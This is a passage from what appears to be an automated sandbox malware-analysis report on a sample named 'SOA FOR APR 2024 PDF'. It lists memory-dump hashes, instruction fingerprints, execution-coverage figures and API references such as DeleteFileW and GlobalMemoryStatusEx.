                                  • Opcode Fuzzy Hash: 0d2eb8d6343487ca7f4967b13b616a346af2b6b333c19be5785604c51a66ae48
                                  • Instruction Fuzzy Hash: 3AD14831C1075A8ACB11EF64DA50A9EB3B1FF96300F10C79AE0093B665FB746AC5CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 58e3ceb1e675c2d30632e60b5e426e6c64659ad0cfd2fef28a207844968e0a18
                                  • Instruction ID: 90320b964593652ef4da06c8663f3974d756344d4d0251273691cc652a8d64ad
                                  • Opcode Fuzzy Hash: 58e3ceb1e675c2d30632e60b5e426e6c64659ad0cfd2fef28a207844968e0a18
                                  • Instruction Fuzzy Hash: 4BD13831C1075A8ACB11EF64DA50A9EB3B5FF96300F10C79AE0093B665FB746AC5CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: afaffd2b1f8fc896e4abbf71bcd2986e58dc18a189bf5def6c34d2dc1a28c786
                                  • Instruction ID: 4805ea745fa20bce1d64865c37812e90caf514484b5c57022d873206525b13cb
                                  • Opcode Fuzzy Hash: afaffd2b1f8fc896e4abbf71bcd2986e58dc18a189bf5def6c34d2dc1a28c786
                                  • Instruction Fuzzy Hash: 35A16A32A002198FCF09DFB5C8445DEBBB2FF84304B15557AE916BB265DB35E986CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2074098336.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4f40000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4ebeb0e4115345474126cc88525cc2f8e6c89e03eabbade377159b2afe4ea431
                                  • Instruction ID: 11cce3430b3ca3e480fbf3653114e793a6abaaa4fdb3ed6f7bc257678643e84e
                                  • Opcode Fuzzy Hash: 4ebeb0e4115345474126cc88525cc2f8e6c89e03eabbade377159b2afe4ea431
                                  • Instruction Fuzzy Hash: C8C1E3B2801B4A8ED710CF26ED4C18ABFB1BB85328BA55609D1617B3F4DBB4158ECF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd587186e5c824d6ad525b84f71d589daa4d36c6e575badaa62ef956592ec53d
                                  • Instruction ID: b7149f253c9929ad6b25da8f755e37b324769fe5df2738628349ca43a3aaea0b
                                  • Opcode Fuzzy Hash: cd587186e5c824d6ad525b84f71d589daa4d36c6e575badaa62ef956592ec53d
                                  • Instruction Fuzzy Hash: E2512CB0E042198FDB15DFA9C6805AEFBF2BF89305F24C16AD418AB356D7349A41CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:10.1%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:57
                                  Total number of Limit Nodes:6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: 254f54cb6990bfb9cc87280f72cf8bac26651a5e3e57a03746741e5d6ddb0aee
                                  • Instruction ID: 63862cfdc0e9f434b68f91f3aeca856da343955e325150e61d97169bcadb8390
                                  • Opcode Fuzzy Hash: 254f54cb6990bfb9cc87280f72cf8bac26651a5e3e57a03746741e5d6ddb0aee
                                  • Instruction Fuzzy Hash: ABD25830A00605CFDB64DF68C594AADB7F6FF85300F5495AAD409AB365EB34ED86CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: 483615c979a7cc42bfcb8f089144bf9d13e9e9c6debe00d4b38749731b3a2993
                                  • Instruction ID: 041004b212bdb1f5422fa8e3583d1f388c237b58242b58f7a99db3ec4fda9e2a
                                  • Opcode Fuzzy Hash: 483615c979a7cc42bfcb8f089144bf9d13e9e9c6debe00d4b38749731b3a2993
                                  • Instruction Fuzzy Hash: DB525C30E10209CFDBA4DF69D5807AEB7A6EB85310F24952AE405EB395DF34EC85CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq
                                  • API String ID: 0-3720491408
                                  • Opcode ID: 834497b14fec938e576eab2e499af82dd962c05b89b8842097d2d8772a727622
                                  • Instruction ID: 190eeabdb8d7a8991f1e87d0b58e8a115f316a63f3670f7b1f7139e366156119
                                  • Opcode Fuzzy Hash: 834497b14fec938e576eab2e499af82dd962c05b89b8842097d2d8772a727622
                                  • Instruction Fuzzy Hash: 2D02AD30B00605CFCB54DF68D594AAEBBB6FF84344F248569E4059B399DB35ED86CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $
                                  • API String ID: 0-3993045852
                                  • Opcode ID: 4ee7be09fb4d6cc3fc8f342dba94fd37b25e24bef54919118e5813d7be408aed
                                  • Instruction ID: cca0bd14f6c3f7bf158506ec6b78355654be28845487432a623271cc67e94a98
                                  • Opcode Fuzzy Hash: 4ee7be09fb4d6cc3fc8f342dba94fd37b25e24bef54919118e5813d7be408aed
                                  • Instruction Fuzzy Hash: 5422BE71E10219DFDF60DFA4C5906EEBBB2EF84320F24846AD416AB395DA35DD81CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: daf2cc2491de101a5f5d7073188d119a312f0301f95d320adb9a1d28e14af466
                                  • Instruction ID: 42f924a6f7421b0fd8c6c546679b348e77310eb02530a5e8b0b469f894954b5c
                                  • Opcode Fuzzy Hash: daf2cc2491de101a5f5d7073188d119a312f0301f95d320adb9a1d28e14af466
                                  • Instruction Fuzzy Hash: 3C629D34B00205CFDB54EB68D584AADBBF6EF84314F249469E406EB395DB35ED86CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 81e976e9d80037b3697ed79d6c55a8e2caf9370cec62dcd9b948d74669bb6b6b
                                  • Instruction ID: 56061034dd4f0e7627ca5c1b4e60fd11952240472531028e00b31b377383e200
                                  • Opcode Fuzzy Hash: 81e976e9d80037b3697ed79d6c55a8e2caf9370cec62dcd9b948d74669bb6b6b
                                  • Instruction Fuzzy Hash: 3A32AF34B00205CFDB54EB68D994AEDBBB6FB88310F109569E409E7359DB34ED85CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-666546452
                                  • Opcode ID: d22a90a8b10fc003625166f6b5cb21e567c91b9b876b9301f31f90b29372bb1a
                                  • Instruction ID: 2f52b6790a40c74a719871c79c99e603e03a1f3fd9edf36522d1ad48b232fdc4
                                  • Opcode Fuzzy Hash: d22a90a8b10fc003625166f6b5cb21e567c91b9b876b9301f31f90b29372bb1a
                                  • Instruction Fuzzy Hash: 08E16C30E10209CFDB69EFA5D9946EEB7B6EF85300F109529E415AB359DB34DC86CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: 8eea426b01a2b6c0e0ffd8048664bef23af633ab565cfc01b091b1a9e6efa228
                                  • Instruction ID: c54e61f811abf1994f9deb47d61d690bbeed75f9c8ff0b987a9b8870c5a85edc
                                  • Opcode Fuzzy Hash: 8eea426b01a2b6c0e0ffd8048664bef23af633ab565cfc01b091b1a9e6efa228
                                  • Instruction Fuzzy Hash: 45916030F0060A8FDB94DF65D9547AE77B6AF85340F108569D909EB398EB30ED868B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq
                                  • API String ID: 0-3696375380
                                  • Opcode ID: 51df000b1a2ef0991d44d992336fd2aedcd227ce5147859a2d7cf01800387303
                                  • Instruction ID: 427d04f44dfbfd64941ffc9028f97357087b146b3991486602afb56dcc3740be
                                  • Opcode Fuzzy Hash: 51df000b1a2ef0991d44d992336fd2aedcd227ce5147859a2d7cf01800387303
                                  • Instruction Fuzzy Hash: 86623030A00605CFCB55EF68E590A9EB7BAFF84314F209669D0059F369DB75ED86CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3280595142.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_e90000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (nq$(nq$(nq
                                  • API String ID: 0-1280547490
                                  • Opcode ID: ef37089162d5336d0a1bebabeba99672cff8b3b4caf2d365dc695edf416ddf52
                                  • Instruction ID: 915f6c2e07fcc394a250b97d97428f1c3cda37d54879e6e2cdd429cf09fbc939
                                  • Opcode Fuzzy Hash: ef37089162d5336d0a1bebabeba99672cff8b3b4caf2d365dc695edf416ddf52
                                  • Instruction Fuzzy Hash: C5D19A71E003098FCB15DFA9C8546AEBBF2EF88310F148569E409BB291DB74AD81CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: foq$XPoq$\Ooq
                                  • API String ID: 0-3137531485
                                  • Opcode ID: d9ba88a302921cf9e1004cb1103192ec25c76b297cff7d8d45830a805870108f
                                  • Instruction ID: 96082a2c192b8143135ada87c9d5809e39f7db2d46f6c3a48c67007a077c23b2
                                  • Opcode Fuzzy Hash: d9ba88a302921cf9e1004cb1103192ec25c76b297cff7d8d45830a805870108f
                                  • Instruction Fuzzy Hash: B9617230E002089FEF549FA4C8557AEBAF6FF88700F208129E106AB395DF758D459B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq
                                  • API String ID: 0-3720491408
                                  • Opcode ID: 33036b38116735be119f343afc089049020c6e1e3d92d3cdbcc3854a1c27946d
                                  • Instruction ID: 09ed62043918f6342ca5cfed6c72eda1d88cac5d9bac862cd7c90d4da908d47e
                                  • Opcode Fuzzy Hash: 33036b38116735be119f343afc089049020c6e1e3d92d3cdbcc3854a1c27946d
                                  • Instruction Fuzzy Hash: B8517130B005068FDB94EF78D954BAE77F6EF85340F108569D909EB398EA34DC468B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2512 f08168-f081ba 2515 f081c2-f081ed DeleteFileW 2512->2515 2516 f081bc-f081bf 2512->2516 2517 f081f6-f0821e 2515->2517 2518 f081ef-f081f5 2515->2518 2516->2515 2518->2517
                                  APIs
                                  • DeleteFileW.KERNELBASE(00000000), ref: 00F081E0
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3280923727.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_f00000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 77ce84a499247179530fb40158dbb7ffc3e5795d83b31b925dc2e6fb01624124
                                  • Instruction ID: db2b73d9247139bf8256d0938fbe86ab6843a1aaa6a95892f0dd641ac5a051c5
                                  • Opcode Fuzzy Hash: 77ce84a499247179530fb40158dbb7ffc3e5795d83b31b925dc2e6fb01624124
                                  • Instruction Fuzzy Hash: 7C2115B1C0061A9FCB14CF9AC445BAEFBB5FF48320F158129D958A7241D738A941CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2521 f07800-f081ba 2524 f081c2-f081ed DeleteFileW 2521->2524 2525 f081bc-f081bf 2521->2525 2526 f081f6-f0821e 2524->2526 2527 f081ef-f081f5 2524->2527 2525->2524 2527->2526
                                  APIs
                                  • DeleteFileW.KERNELBASE(00000000), ref: 00F081E0
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3280923727.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_f00000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 85a8543aefa2c80b328f6c91aa5b1f18c28ac9ff48bfdd0fc27610391c01bf4a
                                  • Instruction ID: b378dd30d0d40265604eec47844ba88da1bf922893fbc8d69a1000340a74b6dc
                                  • Opcode Fuzzy Hash: 85a8543aefa2c80b328f6c91aa5b1f18c28ac9ff48bfdd0fc27610391c01bf4a
                                  • Instruction Fuzzy Hash: 862144B1C0061A9BCB10DF9AC4447AEFBB5FF08320F10812AE858B7240D738A941CFE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2530 f0f088-f0f0fc GlobalMemoryStatusEx 2532 f0f105-f0f12d 2530->2532 2533 f0f0fe-f0f104 2530->2533 2533->2532
                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE ref: 00F0F0EF
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3280923727.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_f00000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  • Opcode ID: c86a9e5a798ab91ec483e2263027b43374b86314a78807d7fdc5a1b7e086a0d7
                                  • Instruction ID: 328170cb035968205d7854baf97ff617c372e4adffe9f7d31fa8a9be29fab7b3
                                  • Opcode Fuzzy Hash: c86a9e5a798ab91ec483e2263027b43374b86314a78807d7fdc5a1b7e086a0d7
                                  • Instruction Fuzzy Hash: EA111FB1C0065A9BCB10DF9AC444BAEFBF4BF48320F15812AE818A7241D778A944CFE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3279011563.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_c9d000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: daf20eaae00cf1712ad2ba72684d7542a09f7d57142c32a4d210f7f443844865
                                  • Instruction ID: f8e5a911bc570344139ce3a46699d1d5d5b5482d106fd05d1eb5bab8a5e7d1ad
                                  • Opcode Fuzzy Hash: daf20eaae00cf1712ad2ba72684d7542a09f7d57142c32a4d210f7f443844865
                                  • Instruction Fuzzy Hash: 5F213571504744DFDF05DF14D9C8F26BB65FB94324F20C6A9E94A2B246C37ADC06CAA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3279011563.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_c9d000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 92056a83f97ae7a2c42aa3952cbf0591e6b8d3dd59acb434d099a6c5acfba610
                                  • Instruction ID: 9a792d6d43ac669eaa50384a2caedcfae63239b068dc2c2a41e1ab589081f8d3
                                  • Opcode Fuzzy Hash: 92056a83f97ae7a2c42aa3952cbf0591e6b8d3dd59acb434d099a6c5acfba610
                                  • Instruction Fuzzy Hash: 4E210475504204DFCF04DF24D9C8B26BBA5FB94314F20C56DE90A5B296C37AE846CA62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3279011563.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_c9d000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff91a17261f97f9a35fb3e40ac923993e2db27318ebd085c9f7c0800c192859c
                                  • Instruction ID: 1668c13f459babcf537604fd9914e52f6dfbd59d130dc853d2218f7711db757e
                                  • Opcode Fuzzy Hash: ff91a17261f97f9a35fb3e40ac923993e2db27318ebd085c9f7c0800c192859c
                                  • Instruction Fuzzy Hash: 0721F2715042049FCF14CF24D9C8B26BF65FB84314F20C569E94A5B252C73AD856DA62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3279011563.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_c9d000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff486edeb9af520e9e1fb764179bb8216229f3dbf384a77d4ef5da60c30bc609
                                  • Instruction ID: d027866afb4160d975024b4d857adf576f1fad4fb460146181f65a9dbf41828c
                                  • Opcode Fuzzy Hash: ff486edeb9af520e9e1fb764179bb8216229f3dbf384a77d4ef5da60c30bc609
                                  • Instruction Fuzzy Hash: 1B210472544240DFDF04DF28D9C8B2ABF65FB94324F20C56DD90A5B366C33AD846C662
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3280595142.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_e90000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 85aabf61af798f5b17dac9ee122734a68750d978bff9b348f53de2c6a3bf7e1e
                                  • Instruction ID: adec5af7d284621d21566b76aae048a94cbcfe65b630a8949441862e56b9876b
                                  • Opcode Fuzzy Hash: 85aabf61af798f5b17dac9ee122734a68750d978bff9b348f53de2c6a3bf7e1e
                                  • Instruction Fuzzy Hash: CA31E2B0D01218DFDB24DF99C589BDEBBF5EB48314F64901AE408BB340D7B59885CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 317b867ea99198d711485222b04f145a5631a8f4795311cc6494fc160984cbc7
                                  • Instruction ID: 57e4fe709e7807cbdbced10c78fe708c57e2647f9307665c9ccf8676400cc830
                                  • Opcode Fuzzy Hash: 317b867ea99198d711485222b04f145a5631a8f4795311cc6494fc160984cbc7
                                  • Instruction Fuzzy Hash: 5921A231F00119DBCF94DA69F9546EDBBBAEB84310F249429E405E7354DB35ED818B84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b608c1be1196df0cb7f6bd805f1cc80c21e56d0cc7432f16fda7029fe481718d
                                  • Instruction ID: 13b1b883986828cd74a06f8907fbbe1504c6207ede2d5eec35c2f29a31dab16e
                                  • Opcode Fuzzy Hash: b608c1be1196df0cb7f6bd805f1cc80c21e56d0cc7432f16fda7029fe481718d
                                  • Instruction Fuzzy Hash: 2C118E71F002289BCB65DF68D9805DEFBB5EB89310F1095AAE009FB304EB359985CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4968a68c5898bc533f7beefce30c1b3a369625504cfcd69ae5587814c18fb0a6
                                  • Instruction ID: 5f89fe966d699b147c7ada48dd52b8061fa948a81f472b3ee8a1bdacd0f8a3aa
                                  • Opcode Fuzzy Hash: 4968a68c5898bc533f7beefce30c1b3a369625504cfcd69ae5587814c18fb0a6
                                  • Instruction Fuzzy Hash: B9110060B20224ABEF60366DDC1036F248ECB85760F20482BE40AD73F6C82CCC8243E6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ca4b2785b51185d80dcdd9e35ef6da317e079d13cf81839134e088d785165fba
                                  • Instruction ID: 4c64cd7258ece1058bacba056d2f422b1889242c5aa161070b635ab9b5779dfa
                                  • Opcode Fuzzy Hash: ca4b2785b51185d80dcdd9e35ef6da317e079d13cf81839134e088d785165fba
                                  • Instruction Fuzzy Hash: FF01B160B60228ABEF64356DDD5076F208ECBC5B60F20482AE40AD73F5C968CC8143E6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 41330b23ddbce327805963da9c1d11f5295989eb91a44f41e661c73daefcc244
                                  • Instruction ID: 831e7372edb3920a73dd803abc3dae6e477ed6cd90337d1c753e1bc393462b59
                                  • Opcode Fuzzy Hash: 41330b23ddbce327805963da9c1d11f5295989eb91a44f41e661c73daefcc244
                                  • Instruction Fuzzy Hash: ED118E31B141288BDB94DA68D8146EF77FAEBC8250F004439D406E7358EE69DC428BD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 35df1f2cb916a9a33279d14e674dff2f387db71fa55b23dff92775a22abfbb1d
                                  • Instruction ID: fa9ba248f5b80b944aaa74d641f037a9c5808d279f3428e6622a5016dc88e3b6
                                  • Opcode Fuzzy Hash: 35df1f2cb916a9a33279d14e674dff2f387db71fa55b23dff92775a22abfbb1d
                                  • Instruction Fuzzy Hash: 25012838B101108FDB6596BCD8517AAE7EADBC9710F20883BE50AC7359EE38DD428350
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1ee4d32c0018c26aea2074952cfcd374494692063fff1887cbc240a0140ea68
                                  • Instruction ID: e6ea38d06b36c036d9ee98ca77b3cc6404798c0c56d57ce27ad4e6fce8eb4d1a
